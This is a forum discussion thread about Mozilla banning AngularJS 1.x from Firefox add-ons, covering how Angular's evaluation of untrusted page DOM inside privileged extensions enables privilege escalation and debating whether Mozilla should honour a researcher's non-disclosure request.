Unless the discloser was the US Government and the request was actually a court order. But this seems ludicrous. If they require secrecy around the exploit, they wouldn't have disclosed it to Mozilla at all.
Mozilla is probably unable to disclose not just the vulnerability, but other surrounding info they may have been provided, including which other parties have received that info. They are not saying the Angular team is unaware of the problem, right? Only that they themselves are not the ones reporting it.
If you don't honor such request without a VERY STRONG reason, nobody in their right mind will ever disclose anything to you ever again. Right now we don't and can't know if such a strong reason exists.
"They are not saying the Angular team is unaware of the problem, right?"
Are we just going to assume the folks at Mozilla are clairvoyants? How would they know what the Angular team knows? If it's known in general that the Angular team knows about this issue already, perhaps through other means, then the statement that they haven't disclosed this to the Angular team makes no sense. The statement is, "Mozilla is choosing to do it's part to keep Angular in the dark about this."
Mozilla is definitely in a position to reject NDA protected security information, but then they wouldn't have been privy to the security information which a researcher was conditionally offering.
Would it be better to reject the information outright? Or would you suggest that Mozilla make agreements in bad faith, deceitfully agreeing to terms they don't intend to honor?
I have no idea if that is the case here, but it is completely normal that some vulnerabilities have a set disclosure date to allow for coordinated responses. You can either get the information early but under non-disclosure, or along with everyone else. Most people play by these rules (with a few notable exceptions).
> Unless the discloser was the US Government and the request was actually a court order.
If this were the case, I think it's actually the best reason to disregard the request of the discloser and disclose, as it's now in the public interest (ie, closing a possible backdoor being used to surveil dissidents, etc), not merely part of a private agreement.
But yeah, if mozilla signed an NDA on this, that seems like it was a bad move from the get-go.
If the vulnerable part is in Angular, there's a 100% chance that someone can write code in plain JS that is vulnerable to the same attack. E.g. if there was something in the hashbang-url-router that would lead to eval'ing the code in the hash (which I just made up, but would describe such a class of vulnerability). This means it's pointless to ban Angular.
If something Angular does triggers an issue in the Firefox JS engine, it is Firefox that should be fixed, instead of allowing essentially a 0day exploit to be alive.
> If the vulnerable part is in Angular, there's a 100% chance that someone can write code in plain JS that is vulnerable to the same attack.
“can”, not “will”. If everything that uses Angular is vulnerable (unlikely? I couldn’t say), why would you not ban it? This is along the lines of “If Heartbleed is in OpenSSL, there’s a 100% chance that someone can write code in plain C that is vulnerable to the same attack”. Yeah, they can, and it happens all the time, but why not fix a known hole?
> E.g. if there was something in the hashbang-url-router that would lead to eval'ing the code in the hash (which I just made up, but would describe such a class of vulnerability). This means it's pointless to ban Angular.
This would be an excellent reason to ban Angular since a huge majority* of extensions never use eval().
* If this isn’t true… I don’t want to be in web dev anymore.
As AgentME clarifies above, Angular uses a lot of `eval()` of DOM elements, which is perfectly reasonable design decision when you control the contents (as you would if you used Angular in your own app), but a perfectly awful thing to do if the attacker controls the contents (as they would if you used Angular in a browser extension that processes 3rd party webpages).
> there's a 100% chance that someone can write code in plain JS that is vulnerable to the same attack
This is plainly false - please don't spread fear where it doesn't belong.
I'm sure you can think of some things that, when written into the privileged environment of an addon, create vulnerabilities that aren't possible in "plain JS."
There is nowhere near a "100% chance" that this is a problem for web apps that don't run as browser extensions.
Let me make sure I understand this. This vulnerability is basically because the addon authors are using angular to parse webpages, and therefore because they don't have control over the DOM elements angular is being used on, they're vulnerable to all the xss escapes in [0], right?
Because as far as I can tell, all of the escapes in [0] require the attacker to write to the DOM being evaluated by the angular engine. Normally this isn't a big deal, because the developer controls the DOM. In more pedestrian situations, if you've got a wiki, cms, forum, or other situation where untrusted people are creating content, you can't give those content creators the ability to write to parts of the DOM where an xss abuse might happen, and if you do it is pretty much your fault anyway (angular isn't really to blame here, because if you're letting users write to the DOM directly you've got trust issues).
The mozilla situation is particularly problematic because the mozilla addon runs its javascript context in some elvated privilege mode, and normally that javascript just manipulates the DOM directly to generate addon-specific UI (like password fill helpers, for example). But because that angular is being run on a DOM outside of the control of the addon authors, it's also subject to all kinds of XSS escapes.
I get that, it's fair. Seems like, though, this isn't really an angularjs issue specifically. It feels like this is a broad problem with the security model for browser addons. Like: replace angular with some other view library that you rolled yourself and it could still have all kinds of issues.
Basically anything that uses the DOM to store state (instead of a one-way state -> dom transformation) is subject to manipulation by malicious DOM injections, be they from forum posters or creators of pages that will be visited by plugin users. So, again: I see why angular1 has issues here. But this is a much bigger security hole, honestly. I don't think the javascript runtime for plugins should expose anything to the js running on the page, but that's a lot more complicated, since the plugin runtime is almost always really interested in spidering the page DOM and altering it by responding to the state of that DOM.
>I don't think the javascript runtime for plugins should expose anything to the js running on the page, but that's a lot more complicated, since the plugin runtime is almost always really interested in spidering the page DOM and altering it by responding to the state of that DOM.
Firefox/Chrome/Safari extensions already run in an "isolated world" so that they have separate sets of global variables and DOM-wrappers, so that javascript values never leak directly and modifications to globals don't affect other worlds. However, they all see and manipulate the same content in the DOM. I'm unsure if you're proposing anything different from the current situation.
If there is some permutation of JavaScript statements (library or otherwise) that displays a security vulnerability for the user, isn't that the browser's fault and not the application's? And isn't library detection just a hacky substitute for an actual fix of said fault?
It's not the browser's fault if an extension has a vulnerability which gives away the capabilities the extension was given. It would be the browser's fault if the extension had a vulnerability which somehow managed to give away more permissions than the extension was given in the first place.
In this specific case, Angular runs eval-like functions on HTML in the DOM. The DOM can be controlled by the webpage. If Angular is running in a higher-privilege extension, then the webpage can put code in the DOM and let Angular execute it from within the extension. This seems to be a fundamental part of Angular 1.x's design. It just isn't built for this use case.
The extension has access to certain information provided by the user and the browser. Due to a vulnerability, that information is no longer secure, and may be used in ways that the user of the extension does not expect nor has approved. The platform holder treats vulnerable extensions as if they were effectively malware, and bans them.
Hard to go deeper without further information, but it makes sense to me.
I am really worried about the security implications for addons like bitwarden, if mozilla is right about this. I hope that competent people will take a close look.
Isn't any "vulnerability" in a JS framework a vulnerability in the browser's own handling of securing it? Like, there is nothing angular is doing that someone else couldn't do, intentionally, to create said issue, right? Wouldn't the correct handling of this to be to secure the damned interpreter thats running the code to prevent it from having the effect they are trying to mitigate?
Angular evals text stored in the DOM. If you alone are in control of the DOM (like in a normal webpage), there's no issue. If someone else is in control of the DOM (you're running Angular in a higher-privileged extension running on a random webpage's DOM), then they can put code into the DOM which then gets picked up by Angular and executed within the extension with the extension's full permissions. This isn't an issue inherent to the language or browser at all. This is an issue just comes from that Angular 1.x is designed for use-cases where the DOM is trusted, and that's not the case for browser extensions.
But thats not special to angular... right? You can write that in vanilla javascript just the same - the issue is that the script running in the extension is given the ability to do that. They dont seem to be blocking a feature in javascript, they seem to be blocking a lib that uses it. Angular can't do ANYTHING that any other bit of javascript can't do in the same context.
Angular is just JS, its not special JS, its just JS. If angular can do something, it can be done without angular so blocking angular does nothing to prevent the vulnerability.
Eval has legitimate uses, and there's plenty of ways that extensions can be insecure or malicious without using eval.
Firefox's Addons Marketplace reviews extensions and rejects ones that are malicious or insecure.
The issue is not that Angular uses an inherent insecure feature. The issue is that Angular does insecure things: it lets a webpage run any code with the extension's privileges. If the extension has privileges to your email domain, then the webpage can abuse the extension's privileges to harvest your email. An extension that let your email be harvested would get rejected regardless of whether it used eval or not. (For example, a malicious extension could be made which doesn't use eval and is just a couple hard-coded lines to make privileged AJAX connections to gmail.com. There's no technical features that the extension is using that shouldn't be available.)
Uhm, wait what? Firefox extensions can execute literal code from visited a website?
To me that sounds like the root cause of the problem and a glaring security hole - either the website has to be sanitized/projected into a harmless dom abstraction or extensions shouldn't be able to use any kind of dynamic evals.
Sure angular may be vulnerable by default but good luck thinking that all other extensions out there are safe and not using evals at any point.
>either the website has to be sanitized/projected into a harmless dom abstraction
Should Firefox contain code to recognize text that looks like Angular templates and then break it somehow? That'd be extremely specific.
Eval isn't an inherently unsafe feature, and it doesn't have a monopoly on insecurity: Angular doesn't even require eval. It can run without eval in a CSP-supporting mode that's equally vulnerable.
Angular 1.x is still quite being actively developed and it will be many years before it will become unsupported. I'm sure if they report the vulnerability it would be fixed instantly seeing the amount of activity on github.
The issue is a fundamental part of Angular 1.x's design. It runs eval on text within the page DOM. This isn't secure within extensions where the page DOM is controlled by the webpage, and Angular is running within a higher-privileged extension.
> Angular is running within a higher-privileged extension.
Ok, thanks for the explanation. I've developed chrome extensions before but firefox very long time back, so my knowledge is rusty, but please tell me 2 things:
1. Say hypothetically if AngularJs can do it, doesn't that mean any Javascript can do it too? I mean Javasript contained within the extension code?
2. In chrome extensions we use "ng-csp", otherwise it won't run. Is this addressing the same thing in chrome and if so, why can't it do it in firefox?
>1. Say hypothetically if AngularJs can do it, doesn't that mean any Javascript can do it too? I mean Javasript contained within the extension code?
Angular doesn't have a monopoly on insecure code! Anyone can write insecure or malicious code. Firefox's Addons Marketplace will reject an insecure extension just the same when they notice anything amiss whether it uses Angular or not.
>2. In chrome extensions we use "ng-csp", otherwise it won't run. Is this addressing the same thing in chrome and if so, why can't it do it in firefox?
Chrome enforces a CSP directive that prohibits eval in UI pages. This is unrelated to Angular being insecure to use in extension content scripts. (When I've said a few times that Angular is insecure because it "evals content from the DOM", I'm not trying to be specific to the `eval` function. I think its CSP fallback is just as insecure.) Angular 1.x is bad news in Chrome content scripts just the same.
That suddenly makes Angular look scary for some clients. vulnerability that is known to an entity/entities but unknown to the Angular developers or contributors....
The vulnerability occurs only if you inject Angular into a web page from browser extension in some browsers. There is no vulnerability if you are writing a SPA using Angular.
Overkill for what was never intended to be a sandbox for untrusted code. The “sandboxing”, like Django templates’, Jinja, Nunjucks, etc. is a well-intended measure to keep logic out of templates, but in practice only really gets in the way and causes mistaken assumptions about security.
I can't help but think that he's right though. Not explicitly but implicitly. By keeping the vulnerability from the dev team they're allowing it to stay out in the wild. No?
There's a world of difference between an exploit being known to someone and that exploit being put up for sale on the black market. In either case, if the researcher who found the exploit sold it, that hardly makes Mozilla complicit in his actions.
I am not sure that I agree. It's hard for me to say where the responsibility for disclosure lies, but if I was Mozilla I'd need to find a good reason not to disclose such a vulnerability to the project owner/development team.
I am not sure that being asked not to disclose is a good enough reason without further justification; in fact it seems like a poor reason to me. Mozilla is in my view kind of a shepherd for internet users and I'd hope they'd fall more on the side of "let's not let our users get owned unnecessarily" than that of "let's sit on this vulnerability just because the disclosing party asked us to."
Well, first of all if they disclosed it they would likely be sued for violating an NDA. Secondly, this would set a bad precedent because now who would ever trust Mozilla with a vulnerability that's behind an NDA?
Isn't it a little soon to be judging them at all? We don't even know if this affects regular use of Angular (on websites) rather than just on rare use cases like browser extensions.
That was the way I read it initially to. I think the intended meaning was that we don't know anything about it, up to and including this ridiculous claim. It's more to highlight the lack of transparency than actually put forth a viable theory.
What do you mean by claiming to not have framed it as a legitimate theory; you're saying it's an illegitimate theory, as in, you yourself don't believe it's true?
It was hyperbole. I personally think that the language is clear too. Here's a good post explaining the usage of the phrase "For all I know" since apparently HN isn't familiar with the idiom https://english.stackexchange.com/questions/92207/what-is-th...
His statement was literally correct, and useful in highlighting a different perspective on what is known to be known. The negativity seems to stem from not taking it literally.
Occam says that the security researcher has notified critically affected parties through the normal channels and Mozilla and others are embargoed from talking about it until its been fixed?
This thing makes me believe that we should not use any OSS project which released by a big companies such as Google and Microsoft. Even if they don't say that they're dropping support, when they start to work on another project, it won't be a community-driven project and slowly die.
Browser extensions are really dangerous; if you need to keep your machine secure, you shouldn't use any IMHO. By definition, browser extensions need to be able to access things such as page content. What would stop someone from writing a extension that captures your bank credentials? Nothing.
Obviously no security-conscious user is going to install a bank credential stealing extension. But what about bugs in extensions? If a buggy extension can be made to execute arbitrary code, it is as dangerous as a malicious extension (if the arbitrary code execution works in the same circumstances).
Angular 1.x basically runs eval on DOM content. That's how it works, it's not a vulnerability in normal use. You make a web page using Angular, and possibly the user has a way to eval arbitrary JS code through Angular, but then they have the developer console so they can run arbitrary code anyway.
With browser extensions it's different. The extension is from one source and runs with one set of privileges, and the page comes from someone else and has less privileges. Now if anything from the page can be eval'd in the extension, that's privilege escalation. Someone creating a site can run malicious content as a browser extension.
It's probably possible to sanitize all external inputs used in the browser extension such that privilege escalation isn't possible, but the Angular team has tried hard with their sandbox solution with no success. Extension developers will hardly do much better, so it makes sense for Mozilla to ban the whole library.
Angular wasn't designed for browser extensions.
WRT the security researcher and Mozilla not disclosing other known sandbox vulnerabilities, that's missing the point (but an interesting discussion in itself).